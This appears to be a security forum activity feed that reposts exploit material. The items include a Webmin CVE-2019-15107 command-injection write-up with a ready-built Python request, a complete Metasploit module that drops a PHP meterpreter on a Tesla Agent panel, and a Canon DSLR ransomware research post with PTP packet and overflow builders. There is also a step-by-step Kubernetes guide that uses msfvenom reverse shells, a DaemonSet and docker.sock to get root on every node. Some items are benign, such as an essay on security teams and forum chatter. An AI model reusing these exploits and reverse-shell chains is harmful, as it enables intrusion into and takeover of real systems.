
All Activity


  1. Today
  2. Today’s exploit of the day is one affecting the popular system administration tool Webmin, which is known to run on port 10000. A bug has been found in the password reset function that allows a malicious third party to execute arbitrary code due to a lack of input validation.

Affecting: Webmin instances up to and including the latest version, 1.920, that have the setting “user password change” enabled. The vulnerability has been assigned CVE-2019-15107. As of the time of writing (2019-08-16), it still exists in the latest version you can download from Webmin’s official site.

Vulnerable code in version 1.920:

```
computer@box:/tmp/webmin-1.920$ cat -n password_change.cgi | head -n 176 | tail -29
   148
   149  # Read shadow file and find user
   150  &lock_file($miniserv{'passwd_file'});
   151  $lref = &read_file_lines($miniserv{'passwd_file'});
   152  for($i=0; $i<@$lref; $i++) {
   153          @line = split(/:/, $lref->[$i], -1);
   154          local $u = $line[$miniserv{'passwd_uindex'}];
   155          if ($u eq $in{'user'}) {
   156                  $idx = $i;
   157                  last;
   158                  }
   159          }
   160  defined($idx) || &pass_error($text{'password_euser'});
   161
   162  # Validate old password
   163  &unix_crypt($in{'old'}, $line[$miniserv{'passwd_pindex'}]) eq
   164          $line[$miniserv{'passwd_pindex'}] ||
   165          &pass_error($text{'password_eold'});
   166
   167  # Make sure new password meets restrictions
   168  if (&foreign_check("changepass")) {
   169          &foreign_require("changepass", "changepass-lib.pl");
   170          $err = &changepass::check_password($in{'new1'}, $in{'user'});
   171          &pass_error($err) if ($err);
   172  }
   173  elsif (&foreign_check("useradmin")) {
   174          &foreign_require("useradmin", "user-lib.pl");
   175          $err = &useradmin::check_password_restrictions(
   176                  $in{'new1'}, $in{'user'});
```

Proof of concept

The vulnerability lies in the &unix_crypt function call that checks the supplied password against the system’s /etc/shadow file. By adding a simple pipe character (“|”), the author is able to execute whatever code he wants.
The pipe character, in this context, means “execute this command and then this one”. The author proves that this is very easy to exploit with just a simple POST request. Webmin has not yet made a public statement or announced a patch, meaning everyone running Webmin is running a vulnerable version and should take it offline until further notice. It is still unclear how many public instances of Webmin are exposed on the internet; a quick Shodan search finds a bit over 13 0000.

External links:
Webmin on Wikipedia
Webmin in nmap
Author’s blog post
Archived link of the author’s blog post
NIST CVE
Shodan

Stay up to date with vulnerability management and build cool things with our API. This blog post is part of the exploit of the day series, where we write shorter descriptions of interesting exploits that we index.

Reference Link: https://blog.firosolutions.com/exploits/webmin/?fbclid=IwAR06hKE7owE6af5dXmBaN-o5wioKPeY609QQkXaRwEHRxBMfoCUDaNHq7FY
Download Link: https://www.exploit-db.com/exploits/47230
Download Link 2: https://www.exploit-db.com/exploits/47293
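The author’s proof of concept boils down to that one unauthenticated POST. Here is a hedged sketch of the request in Python: the target host is a placeholder, the injected command is just `id`, and nothing is actually sent (calling `urllib.request.urlopen(req)` would fire it against a real target). The form fields follow the published PoC; note that Webmin rejects requests whose Referer header does not point back at itself.

```python
from urllib.request import Request
from urllib.parse import urlencode

TARGET = "https://10.0.0.5:10000"  # placeholder host, nothing is sent here

# The "old" password field reaches a shell unsanitized, so a pipe
# character smuggles an arbitrary command ("id") into it.
data = urlencode({
    "user": "root",
    "pam": "",
    "expired": "2",
    "old": "wrong|id",
    "new1": "x",
    "new2": "x",
})

req = Request(
    TARGET + "/password_change.cgi",
    data=data.encode(),
    # Webmin checks that the Referer points back at the target itself
    headers={"Referer": TARGET + "/session_login.cgi"},
)
```

With a vulnerable instance, the output of the injected command comes back in the error page that complains about the failed password change.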
  3. ```ruby
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Tesla Agent Remote Code Execution",
      'Description'    => %q{
        This module exploits the command injection vulnerability of tesla agent botnet panel.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Ege Balcı <ege.balci@invictuseurope.com>' # author & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://prodaft.com']
        ],
      'DefaultOptions' =>
        {
          'SSL'      => false,
          'WfsDelay' => 5,
        },
      'Platform'       => ['php'],
      'Arch'           => [ ARCH_PHP ],
      'Targets'        =>
        [
          ['PHP payload',
            {
              'Platform'       => 'PHP',
              'Arch'           => ARCH_PHP,
              'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'}
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "July 10 2018",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the tesla agent with panel path', '/WebPanel/']),
      ]
    )
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, '/server_side/scripts/server_processing.php'),
    )
    #print_status(res.body)
    if res && res.body.include?('SQLSTATE')
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    check
    name = '.'+Rex::Text.rand_text_alpha(4)+'.php'
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path,'/server_side/scripts/server_processing.php'),
      'encode_params' => true,
      'vars_get' => {
        'table'   => 'passwords',
        'primary' => 'password_id',
        'clmns'   => 'a:1:{i:0;a:3:{s:2:"db";s:3:"pwd";s:2:"dt";s:8:"username";s:9:"formatter";s:4:"exec";}}',
        'where'   => Rex::Text.encode_base64("1=1 UNION SELECT \"echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d > #{name}\"")
      }
    )

    if res && res.code == 200 && res.body.include?('recordsTotal')
      print_good("Payload uploaded as #{name}")
    else
      print_error('Payload upload failed :(')
      Msf::Exploit::Failed
    end

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path,'/server_side/scripts/',name)},
      5
    )

    if res && res.code == 200
      print_good("Payload successfully triggered !")
    else
      print_error('Payload trigger failed :(')
      Msf::Exploit::Failed
    end
  end
end
```

Download Link: https://www.exploit-db.com/exploits/47256
  4. Does anyone else want an invitation?
  5. Is this your only account, or do you have more?
  6. These people didn't just "think outside the box", they thought "outside the solar system"...
  7. Synopsis: A simple misconfiguration can lead to Stored XSS. Link: https://medium.com/@nahoragg/chaining-cache-poisoning-to-stored-xss-b910076bda4f
  8. Yesterday
  9. Synopsis: In external and red team engagements, we often come across different forms of IP-based blocking, used to prevent things like password brute forcing and password spraying, to enforce API rate limits, and in defenses such as web application firewalls (WAFs). IP blocking has always been a simple and common way of blocking potentially malicious traffic to a website. The general method of IP-based blocking is to monitor for a certain type of request or behavior, and when it is found, disable access for the IP that the request or behavior came from. In this post, we walk through the need for and creation of a Burp Suite extension that we built in order to easily circumvent IP blocking. Source: https://rhinosecuritylabs.com/aws/bypassing-ip-based-blocking-aws/
  10. BiosHell

    butthax

    the real "penetration testing"
  11. Every Security Team is a Software Team Now
by Dino Dai Zovi

As software is eating the world, every company is becoming a software company. This doesn’t mean that every company is shipping software products; it means that services and products in every field are becoming increasingly driven, powered, and differentiated by software. Let’s explore what that will do to how cybersecurity is practiced in enterprises of all types.

Peter Drucker famously said that “Culture eats strategy for breakfast.” There have been two large cultural shifts in software engineering over the last 20 years that created the successful strategies behind how software is eating the world.

First, there was Agile (2001). In response to the inefficiencies of classic “waterfall” software development, Agile focused on breaking down the barriers between software requirements, development, and testing by having software development teams own their roadmaps as well as their quality. Separate product management organizations evolved into product owners working directly with the software team. Similarly, separate quality assurance organizations evolved into a focus on building quality into the software development process. This should remind us of how we talk about needing to build security in, but most importantly, this change was effected by software teams themselves rather than forced onto them by a separate security organization. There is a lesson to be learned there.

Next came DevOps (2009), which brought the agile mindset to server operations. Software teams now began to own their deployment and their uptime. Treating software teams as the end-user and customer has driven the replacement of traditional ops with the cloud and the replacement of the traditional stack with serverless models. Ops teams evolved into software teams that provide platforms, tools, and self-service infrastructure to internal teams. They provide value by increasing internal teams’ productivity while reducing costs to the entire organization through economies of scale and other efficiencies.

When a cross-functional team owns their features, their quality, their deployment, and their uptime, they fully own their end-to-end value stream. Next, they will evolve to also own their own risks and fully own their end-to-end impact. There are two big shifts involved as teams begin to own their end-to-end impact: software teams need to own their own security now, and security teams need to become full-stack software teams. Just as separate product management and quality assurance organizations diffused into cross-functional software teams, security must now do the same.

At his re:Invent 2018 keynote, Amazon’s CTO Werner Vogels proclaimed that “security is everyone’s job now, not just the security team’s.” But if security is every team’s job, what is the security team’s job? Just as classic ops teams became internal infrastructure software teams, security teams will become internal security software teams that deliver value to internal teams through self-service platforms and tools. Security teams that adopt this approach will reduce the risk to the organization the most while also minimizing the impact on overall productivity. In this talk, we’ll explore how this is already being done across high-performing companies and how to foster this security transformation at yours.
  12. Say Cheese: Ransomware-ing a DSLR Camera

August 11, 2019
Research by: Eyal Itkin

TL;DR

Cameras. We take them to every important life event, we bring them on our vacations, and we store them in a protective case to keep them safe during transit. Cameras are more than just a tool or toy; we entrust them with our very memories, and so they are very important to us.

In this blog, we recount how we at Check Point Research went on a journey to test if hackers could hit us in this exact sweet spot. We asked: Could hackers take over our cameras, the guardians of our precious moments, and infect them with ransomware? And the answer is: Yes.

Background:

DSLR cameras aren’t your grandparents’ cameras, those enormous antique film contraptions you might find up in the attic. Today’s cameras are embedded digital devices that connect to our computers using USB, and the newest models even support WiFi. While USB and WiFi are used to import our pictures from the camera to our mobile phone or PC, they also expose our camera to its surrounding environment. Our research shows how an attacker in close proximity (WiFi), or an attacker who already hijacked our PC (USB), can also propagate to and infect our beloved cameras with malware. Imagine how you would respond if attackers injected ransomware into both your computer and the camera, holding all of your pictures hostage unless you pay a ransom. Below is a video demonstration of this attack.

Technical Details

Picture Transfer Protocol (PTP)

Modern DSLR cameras no longer use film to capture and later reproduce images. Instead, the International Imaging Industry Association devised a standardised protocol to transfer digital images from your camera to your computer. This protocol is called the Picture Transfer Protocol (PTP). Initially focused on image transfer, this protocol now contains dozens of different commands that support anything from taking a live picture to upgrading the camera’s firmware.
Although most users connect their camera to their PC using a USB cable, newer camera models now support WiFi. This means that what was once a PTP/USB protocol accessible only to USB-connected devices is now also PTP/IP, accessible to every WiFi-enabled device in close proximity.

In a previous talk named “Paparazzi over IP” (HITB 2013), Daniel Mende (ERNW) demonstrated all of the different network attacks that are possible for each network protocol that Canon’s EOS cameras supported at the time. At the end of his talk, Daniel discussed the PTP/IP network protocol, showing that an attacker could communicate with the camera by sniffing a specific GUID from the network, a GUID that was generated when the target’s computer was paired with the camera. As the PTP protocol offers a variety of commands, and is not authenticated or encrypted in any way, he demonstrated how he (mis)used the protocol’s functionality to spy on a victim.

In our research we aim to advance beyond the point of accessing and using the protocol’s functionality. Simulating attackers, we want to find implementation vulnerabilities in the protocol, hoping to leverage them in order to take over the camera. Such a Remote Code Execution (RCE) scenario will allow attackers to do whatever they want with the camera, and infecting it with ransomware is only one of many options.

From an attacker’s perspective, the PTP layer looks like a great target:

PTP is an unauthenticated protocol that supports dozens of different complex commands.
A vulnerability in PTP can be exploited equally over USB and over WiFi.
The WiFi support makes our cameras more accessible to nearby attackers.

In this blog, we focus on PTP as our attack vector, describing two potential avenues for attackers:

USB – For an attacker that took over your PC, and now wants to propagate into your camera.
WiFi – An attacker can place a rogue WiFi access point at a tourist attraction to infect your camera.
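Because PTP/IP has no authentication, opening a session is just a matter of sending the protocol’s handshake packet. Below is a minimal sketch of that InitCommandRequest packet, assuming the standard PTP/IP wire layout (length and type header, 16-byte initiator GUID, UTF-16LE friendly name, protocol version); the GUID and name here are arbitrary, and this is exactly the kind of GUID Mende showed could be sniffed off the network.

```python
import struct
import uuid

def init_command_request(guid: bytes, friendly_name: str) -> bytes:
    """Build a PTP/IP InitCommandRequest, the unauthenticated hello packet."""
    assert len(guid) == 16
    name = friendly_name.encode("utf-16-le") + b"\x00\x00"  # UTF-16LE, NUL-terminated
    body = guid + name + struct.pack("<I", 0x00010000)      # protocol version 1.0
    # 8-byte header: total packet length (uint32) + packet type 1 (InitCommandRequest)
    return struct.pack("<II", 8 + len(body), 1) + body

pkt = init_command_request(uuid.uuid4().bytes, "innocuous-laptop")
```

Sent to TCP port 15740 on a camera, a packet like this is all it takes to start talking PTP/IP.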
In both cases, the attackers are going after your camera. If they’re successful, the chances are you’ll have to pay ransom to free up your beloved camera and picture files.

Introducing our target

We chose to focus on Canon’s EOS 80D DSLR camera for multiple reasons, including:

Canon is the largest DSLR maker, controlling more than 50% of the market.
The EOS 80D supports both USB and WiFi.
Canon has an extensive “modding” community, called Magic Lantern.

Magic Lantern (ML) is an open-source free software add-on that adds new features to Canon EOS cameras. As a result, the ML community has already studied parts of the firmware and documented some of its APIs.

Attackers are profit-maximisers: they strive to get the maximum impact (profit) with minimal effort (cost). In this case, research on Canon cameras will have the highest impact for users, and will be the easiest to start, thanks to the existing documentation created by the ML community.

Obtaining the firmware

This is often the trickiest part of every embedded research. The first step is to check if there is a publicly available firmware update file on the vendor’s website. As expected, we found it after a short Google search. After downloading the file and extracting the archive, we had an unpleasant surprise. The file appears to be encrypted / compressed, as can be seen in Figure 1.

Figure 1 – Byte histogram of the firmware update file.

The even byte distribution hints that the firmware is encrypted or compressed, and that whatever algorithm was used was probably a good one. Skimming through the file, we failed to find any useful pattern that could potentially hint at the existence of the assembly code for a bootloader. In many cases, the bootloader is uncompressed, and it contains the instructions needed for the decryption / decompression of the file.
Trying several decompression tools, such as Binwalk or 7Zip, produced no results, meaning that this is a proprietary compression scheme, or even an encryption. Encrypted firmware files are quite rare, due to the added key-management costs for the vendor.

Feeling stuck, we went back to Google, and checked what the internet had to say about this .FIR file. Here we can see the major benefit of studying a device with an extensive modding community, as ML also had to work around this limitation. And indeed, in their wiki, we found this page that describes the “update protection” of the firmware update files, as deployed in multiple versions over the years. Unfortunately for us, this confirms our initial guess: the firmware is AES encrypted.

Being open-source, we hoped that ML would somehow publish this encryption key, allowing us to decrypt the firmware on our own. Unfortunately, that turned out not to be the case. Not only does ML intentionally keep the encryption key secret, we couldn’t even find the key anywhere on the internet. Yet another dead end.

The next thing to check was whether ML had ported their software to our camera model, on the chance it contained debugging functionality that would help us dump the firmware. Although such a port has yet to be released, while reading through their forums and wiki, we did find a breakthrough. ML developed something called Portable ROM Dumper. This is a custom firmware update file that, once loaded, dumps the memory of the camera onto the SD card. Figure 2 shows a picture of the camera during a ROM dump.

Figure 2 – Image taken during a ROM dump of the EOS 80D.

Using the instructions supplied in the forum, we successfully dumped the camera’s firmware and loaded it into our disassembler (IDA Pro). Now we can finally start looking for vulnerabilities in the camera.
Reversing the PTP layer

Finding the PTP layer was quite easy, due to the combination of two useful resources:

The PTP layer is command-based, and every command has a unique numeric opcode.
The firmware contains many indicative strings, which eases the task of reverse-engineering it.

Figure 3 – PTP-related string from the firmware.

Traversing back from the PTP OpenSession handler, we found the main function that registers all of the PTP handlers according to their opcodes. A quick check assured us that the strings in the firmware match the documentation we found online.

Looking at the registration function, we realized that the PTP layer is a promising attack surface. The function registers 148 different handlers, pointing to the fact that the vendor supports many proprietary commands. With almost 150 different commands implemented, the odds of finding a critical vulnerability in one of them are very high.

PTP Handler API

Each PTP command handler implements the same code API. The API makes use of the ptp_context object, an object that is partially documented thanks to ML. Figure 4 shows an example use case of the ptp_context:

Figure 4 – Decompiled PTP handler, using the ptp_context object.

As we can see, the context contains function pointers that are used for:

Querying the size of the incoming message.
Receiving the incoming message.
Sending back the response after handling the message.

It turns out that most of the commands are relatively simple. They receive only a few numeric arguments, as the protocol supports up to 5 such arguments for every command. After scanning all of the supported commands, the list of 148 commands was quickly narrowed down to 38 commands that receive an input buffer. From an attacker’s viewpoint, we have full control of this input buffer, and therefore we can start looking for vulnerabilities in this much smaller set of commands.
Luckily for us, the parsing code for each command uses plain C code and is quite straightforward to analyze. Soon enough, we found our first vulnerability.

CVE-2019-5994 – Buffer Overflow in SendObjectInfo – 0x100C

PTP Command Name: SendObjectInfo
PTP Command Opcode: 0x100C

Internally, the protocol refers to supported files and images as “Objects”, and in this command the user updates the metadata of a given object. The handler contains a buffer overflow vulnerability when parsing what was supposed to be the Unicode filename of the object. Figure 5 shows a simplified version of the vulnerable piece of code:

Figure 5 – Vulnerable code snippet from the SendObjectInfo handler.

This is a buffer overflow inside a main global context. Without reversing the different fields in this context, the only direct implication we have is the Free-Where primitive that is located right after our copy. Our copy can modify the pKeywordsStringUnicode field into an arbitrary value, and later trigger a call to free it. This looks like a good way to start our research, but we continued looking for a vulnerability that is easier to exploit.

CVE-2019-5998 – Buffer Overflow in NotifyBtStatus – 0x91F9

PTP Command Name: NotifyBtStatus
PTP Command Opcode: 0x91F9

Even though our camera model doesn’t support Bluetooth, some Bluetooth-related commands were apparently left behind, and are still accessible to attackers. In this case, we found a classic stack-based buffer overflow, as can be seen in Figure 6.

Figure 6 – Vulnerable code snippet from the NotifyBtStatus handler.

Exploiting this vulnerability will be easy, making it our prime target for exploitation. We would usually stop the code audit at this point, but as we are pretty close to the end of the handler’s list, let’s finish going over the rest.
CVE-2019-5999 – Buffer Overflow in BLERequest – 0x914C

PTP Command Name: BLERequest
PTP Command Opcode: 0x914C

It looks like the Bluetooth commands are more vulnerable than the others, which may suggest a less experienced development team. This time we found a heap-based buffer overflow, as can be seen in Figure 7.

Figure 7 – Vulnerable code snippet from the BLERequest handler.

We now have 3 similar vulnerabilities:

Buffer overflow over a global structure.
Buffer overflow over the stack.
Buffer overflow over the heap.

As mentioned previously, we will attempt to exploit the stack-based vulnerability, which will hopefully be the easiest.

Gaining Code Execution

We started by connecting the camera to our computer using a USB cable. We previously used the USB interface together with Canon’s “EOS Utility” software, and it seems natural to attempt to exploit it first over the USB transport layer. Searching for a PTP Python library, we found ptpy, which didn’t work straight out of the box, but still saved us important time in our setup.

Before writing a code-execution exploit, we started with a small Proof-of-Concept (PoC) that will trigger each of the vulnerabilities we found, hopefully ending in the camera crashing. Figure 8 shows how the camera crashes, in what is described by the vendor as “Err 70.”

Figure 8 – Crash screen we received when we tested our exploit PoCs.

Now that we are sure that all of our vulnerabilities indeed work, it’s time to start the real exploit development.

Basic recap of our tools thus far:

Our camera has no debugger or ML on it.
The camera wasn’t opened yet, meaning we don’t have any hardware-based debugging interface.
We don’t know anything about the address space of the firmware, except the code addresses we see in our disassembler.

The bottom line is that we are connected to the camera using a USB cable, and we want to blindly exploit a stack-based buffer overflow. Let’s get started.
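A crash PoC of the kind described only has to ship an oversized data phase for the vulnerable opcode. The sketch below builds the two standard PTP-over-USB generic containers (command phase, then data phase) for NotifyBtStatus (0x91F9, from the post); the 0x400-byte filler size is an illustrative assumption, and actually delivering the containers requires a USB transport such as ptpy or PyUSB.

```python
import struct

def ptp_container(ctype: int, code: int, tid: int, payload: bytes = b"") -> bytes:
    # Standard 12-byte PTP-over-USB generic container header:
    # length (uint32), container type (1=command, 2=data), op code, transaction id
    return struct.pack("<IHHI", 12 + len(payload), ctype, code, tid) + payload

NOTIFY_BT_STATUS = 0x91F9  # opcode from the post
tid = 1

command  = ptp_container(1, NOTIFY_BT_STATUS, tid)                 # command phase, no params
overflow = ptp_container(2, NOTIFY_BT_STATUS, tid, b"A" * 0x400)   # oversized data phase
```

Writing `command` followed by `overflow` to the camera's PTP bulk-out endpoint is what would overrun the handler's stack buffer and, with unmodified filler bytes, produce the "Err 70" crash.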
Our plan is to use the Sleep() function as a breakpoint, and test if we can see the device crash after a given number of seconds. This will confirm that we took over the execution flow and triggered the call to Sleep(). This all sounds good on paper, but the camera had other plans. Most of the time, the vulnerable task simply died without triggering a crash, thus causing the camera to hang. Needless to say, we can’t differentiate between a hang, and a sleep followed by a hang, making our breakpoint strategy quite pointless.

Originally, we wanted a way to know that the execution flow reached our controlled code. We therefore decided to flip our strategy. We found a code address that always triggers an Err 70 when reached. From now on, our breakpoint will be a call to that address. A crash means we hit our breakpoint, and “nothing” (a hang) means we didn’t reach it. We gradually constructed our exploit until eventually we were able to execute our own assembly snippet – we now have code execution.

Loading Scout

Scout is my go-to debugger. It is an instruction-based debugger that I developed during the FAX research, and that proved itself useful in this research as well. However, we usually use the basic TCP loader for Scout, which requires network connectivity. While we could use a file loader that loads Scout from the SD card, we will later need the same network connectivity for Scout, so we might as well solve this issue now for both.

After playing with the different settings in the camera, we realized that the WiFi can’t be used while the USB is connected, most likely because both are meant to be used by the PTP layer, and there is no support for using them at the same time. So we decided the time had come to move on from USB to WiFi. We can’t say that switching to the WiFi interface worked out of the box, but eventually we had a Python script that was able to send the same exploit script, this time over the air. Unfortunately, our script broke.
After intensive examination, our best guess is that the camera crashes before we return from the vulnerable function, effectively blocking the stack-based vulnerability. While we have no idea why it crashes, it seems that sending a notification about the Bluetooth status when connecting over WiFi simply confuses the camera, especially when it doesn’t even support Bluetooth.

We went back to the drawing board. We could try to exploit one of the other two vulnerabilities. However, one of them is also in the Bluetooth module, and it doesn’t look promising. Instead, we went over the list of PTP command handlers again, and this time looked at each one more thoroughly. To our great relief, we found some more vulnerabilities.

CVE-2019-6000 – Buffer Overflow in SendHostInfo – 0x91E4

PTP Command Name: SendHostInfo
PTP Command Opcode: 0x91E4

Looking at the vulnerable code, as seen in Figure 9, it was quite obvious why we missed the vulnerability at first glance.

Figure 9 – Vulnerable code snippet from the SendHostInfo handler.

This time the developers remembered to check that the message is the intended fixed size of 100 bytes. However, they forgot something crucial: illegal packets are only logged, not dropped. After a quick check in our WiFi testing environment, we did see a crash. The logging function isn’t an assert, and it won’t stop our stack-based buffer overflow 😊

Although this vulnerability is exactly what we were looking for, we once again decided to keep looking for more, especially as this kind of vulnerability will most likely be found in more than a single command.

CVE-2019-6001 – Buffer Overflow in SendAdapterBatteryReport – 0x91FD

PTP Command Name: SendAdapterBatteryReport
PTP Command Opcode: 0x91FD

Not only did we find another vulnerability with the same code pattern, this was the last command in the list, giving us a nice finish. Figure 10 shows a simplified version of the vulnerable PTP handler.
Figure 10 – Vulnerable code snippet from the SendAdapterBatteryReport handler.

In this case, the stack buffer is rather small, so we will continue using the previous vulnerability.

Side note: When testing this vulnerability in the WiFi setup, we found that it also crashes before the function returns. We were only able to exploit it over the USB connection.

Loading Scout – Second Attempt

Armed with our new vulnerability, we finished our exploit and successfully loaded Scout onto the camera. We now have a network debugger, and we can start dumping memory addresses to help us during our reverse engineering process.

But wait a minute, aren’t we done? Our goal was to show that the camera could be hijacked over both USB and WiFi using the Picture Transfer Protocol. While there were minor differences between the two transport layers, in the end the vulnerability we used worked in both cases, thus proving our point. However, taking over the camera was only the first step in the scenario we presented. Now it’s time to create some ransomware.

Time for some Crypto

Any proper ransomware needs cryptographic functions for encrypting the files that are stored on the device. If you recall, the firmware update process mentioned something about AES encryption. This looks like a good opportunity to finish all of our tasks in one go.

This reverse engineering task went much better than we thought it would; not only did we find the AES functions, we also found the verification and decryption keys for the firmware update process. Because AES is a symmetric cipher, the same keys can also be used for encrypting a malicious firmware update and then signing it so it will pass the verification checks.

Instead of implementing all of the complicated cryptographic algorithms ourselves, we used Scout. We implemented a new instruction that simulates a firmware update process, and sends back the cryptographic signatures that the algorithm calculated.
Using this instruction, we now know the correct signatures for each part of the firmware update file, effectively gaining a signing primitive from the camera itself.

Since we only have one camera, this was a tricky part. We wanted to test our own custom home-made firmware update file, but we didn’t want to brick our camera. Luckily for us, in Figure 11 you can see our custom ROM dumper, created by patching Magic Lantern’s ROM Dumper.

Figure 11 – Image of our customized ROM dumper, using our header.

CVE-2019-5995 – Silent malicious firmware update:

There is a PTP command for remote firmware update, which requires zero user interaction. This means that even if all of the implementation vulnerabilities are patched, an attacker can still infect the camera using a malicious firmware update file.

Wrapping it up

After playing around with the firmware update process, we went back to finish our ransomware. The ransomware uses the same cryptographic functions as the firmware update process, and calls the same AES functions in the firmware. After encrypting all of the files on the SD card, the ransomware displays the ransom message to the user.

Chaining everything together requires the attacker to first set up a rogue WiFi access point. This can be easily achieved by first sniffing the network and then faking the AP to have the same name as the one the camera automatically attempts to connect to. Once the attacker is within the same LAN as the camera, he can initiate the exploit. Here is a video presentation of our exploit and ransomware.

Disclosure Timeline

31 March 2019 – Vulnerabilities were reported to Canon.
14 May 2019 – Canon confirmed all of our vulnerabilities. From this point onward, both parties worked together to patch the vulnerabilities.
08 July 2019 – We verified and approved Canon’s patch.
06 August 2019 – Canon published the patch as part of an official security advisory.
Canon’s Security Advisory

Here are the links to the official security advisory published by Canon:

Japanese: https://global.canon/ja/support/security/d-camera.html
English: https://global.canon/en/support/security/d-camera.html

We strongly recommend that everyone patch their affected cameras.

Conclusion

During our research we found multiple critical vulnerabilities in the Picture Transfer Protocol as implemented by Canon. Although the tested implementation contains many proprietary commands, the protocol is standardized, and is embedded in other cameras. Based on our results, we believe that similar vulnerabilities can be found in the PTP implementations of other vendors as well.

Our research shows that any “smart” device, in our case a DSLR camera, is susceptible to attacks. The combination of price, sensitive contents, and a widespread consumer audience makes cameras a lucrative target for attackers.

A final note about the firmware encryption: using Magic Lantern’s ROM Dumper, and later using the functions from the firmware itself, we were able to bypass both the encryption and the verification. This is a classic example that obscurity does not equal security, especially when it took only a small amount of time to bypass these cryptographic layers.

Source: https://research.checkpoint.com/say-cheese-ransomware-ing-a-dslr-camera/
  13. Making it Rain shells in Kubernetes

August 10th, 2019

Following on from the last post in this series, let’s set up a rather more ambitious set of reverse shells when attacking a Kubernetes cluster. The scenario here is that we’ve got the ability to create a daemonset object in a target Kubernetes cluster, and we’d like to have shells on every node in the cluster. The nodes have the Docker socket exposed, so we can get a root shell on each of them. To do this we’ll need something that’ll easily handle multiple incoming shells, so we’ll turn to the Metasploit Framework and specifically exploit/multi/handler.

Step 1: Create the payload

We need a Docker image that we can deploy to the cluster which will have our payload to connect back to the listener that we’re going to set up, and which will run on each node in the cluster. For this we can run msfvenom to set up our payload and then embed that into a Docker image. In this case our pentester machine will be on 192.168.200.1. To avoid managing all Metasploit’s dependencies we can just run it in a Docker container. This command will generate our payload:

docker run raesene/metasploit ./msfvenom -p linux/x64/meterpreter_reverse_http LHOST=192.168.200.1 LPORT=8989 -f elf > reverse_shell.elf

Setting up the Docker Image

Next run this command to get the Docker GPG key into your directory:

curl https://download.docker.com/linux/ubuntu/gpg > docker.gpg

We can now create a Dockerfile to host this shell and upload it to Docker Hub. The Dockerfile is a pretty simple one; we’ll need our payload and also the Docker client, for later use.
FROM ubuntu:18.04
RUN apt update && apt install -y apt-transport-https ca-certificates curl software-properties-common
COPY docker.gpg /docker.gpg
RUN apt-key add /docker.gpg
RUN add-apt-repository \
   "deb [arch=amd64] https://download.docker.com/linux/ubuntu \
   $(lsb_release -cs) \
   stable"
RUN apt-get install -y docker-ce-cli
COPY reverse_shell.elf /reverse_shell.elf
RUN chmod +x /reverse_shell.elf
CMD ["/reverse_shell.elf"]

Build it with (replace raesene below with your own Docker Hub name):

docker build -t raesene/reverse_shell .

Then you can log in to Docker Hub with docker login and upload with:

docker push raesene/reverse_shell

At this point we can test our reverse shell on a single machine by setting up a Metasploit listener and checking that all is well.

Step 2: Setting up Metasploit to receive our shells

On the pentester machine, start up the Metasploit console with msfconsole, then use exploit/multi/handler and set our variables, in the same way we did with msfvenom earlier:

set payload linux/x64/meterpreter_reverse_http
set LHOST 192.168.200.1
set LPORT 8989
set ExitOnSession false

With those set, we can start it up to listen for incoming shells:

exploit -j

Now on a target machine run our shell and we should get that back on the Metasploit console:

docker run raesene/reverse_shell

Assuming that’s all working, we’re ready to scale it up to our Kubernetes cluster.

Step 3: Using a Daemonset to compromise a cluster

So we want a workload which will run on every node in the cluster, and that’s exactly what a daemonset will do for us. We’ll need a manifest that creates our daemonset, and we also want it to expose the Docker socket so we can easily break out of each of our containers to the underlying host. This should work fine, unless the cluster has a PodSecurityPolicy blocking the mounting of the Docker socket inside a container.
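As an aside, the Step 2 handler commands above can be captured in a Metasploit resource script and replayed with `msfconsole -r`, which is convenient when the listener needs restarting. A minimal sketch (the LHOST/LPORT defaults are the post's example values; the file name `handler.rc` is arbitrary):

```python
# Sketch: write a Metasploit resource script reproducing the
# exploit/multi/handler setup from Step 2, so it can be launched
# non-interactively with `msfconsole -r handler.rc`.
HANDLER_RC = """\
use exploit/multi/handler
set payload linux/x64/meterpreter_reverse_http
set LHOST {lhost}
set LPORT {lport}
set ExitOnSession false
exploit -j
"""

def write_handler_rc(path, lhost="192.168.200.1", lport=8989):
    text = HANDLER_RC.format(lhost=lhost, lport=lport)
    with open(path, "w") as fh:
        fh.write(text)
    return text

print(write_handler_rc("handler.rc"))
```

The script just stores the same console commands shown above, one per line, in the order Metasploit expects them.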
We’ll call our manifest reverse-shell-daemonset.yml and it should contain this:

apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: reverse-shell-daemonset
  labels:
spec:
  selector:
    matchLabels:
      name: reverse-shell-daemonset
  template:
    metadata:
      labels:
        name: reverse-shell-daemonset
    spec:
      tolerations:
      - key: node-role.kubernetes.io/master
        effect: NoSchedule
      containers:
      - name: revshell
        image: raesene/reverse-shell
        volumeMounts:
        - mountPath: /var/run/docker.sock
          name: dockersock
      volumes:
      - name: dockersock
        hostPath:
          path: /var/run/docker.sock

Once you’ve got your manifest ready, just apply it to the cluster with:

kubectl create -f reverse-shell-daemonset.yml

Back on your Metasploit console you should see your shells pop in, one for each node.

Getting to root on the nodes

So once you’ve got your shells working, you can interact with them from the Metasploit console.

sessions -l

will show you your active sessions. Then

sessions -i 1

will let you interact with one of them. shell should give you a shell inside the container running on one of our nodes. Now the last part is to use the exposed Docker socket to get a root shell on the underlying host. To do this we can just make use of the ever-handy Most Pointless Docker Command Ever. Running

docker run -ti --privileged --net=host --pid=host --ipc=host --volume /:/host busybox chroot /host

will dump us out to a root shell on the underlying node.

raesene
Security Geek, Penetration Testing, Docker, Ruby, Hillwalking

Sursa: https://raesene.github.io/blog/2019/08/10/making-it-rain-shells-in-Kubernetes/
  14. Apache Solr Injection Research

Table of Contents

Introduction
Solr API quick overview
Apache Solr Injection
Solr Parameters Injection (HTTP smuggling)
Exploitation examples
Solr Local Parameters Injection
Ways to RCE
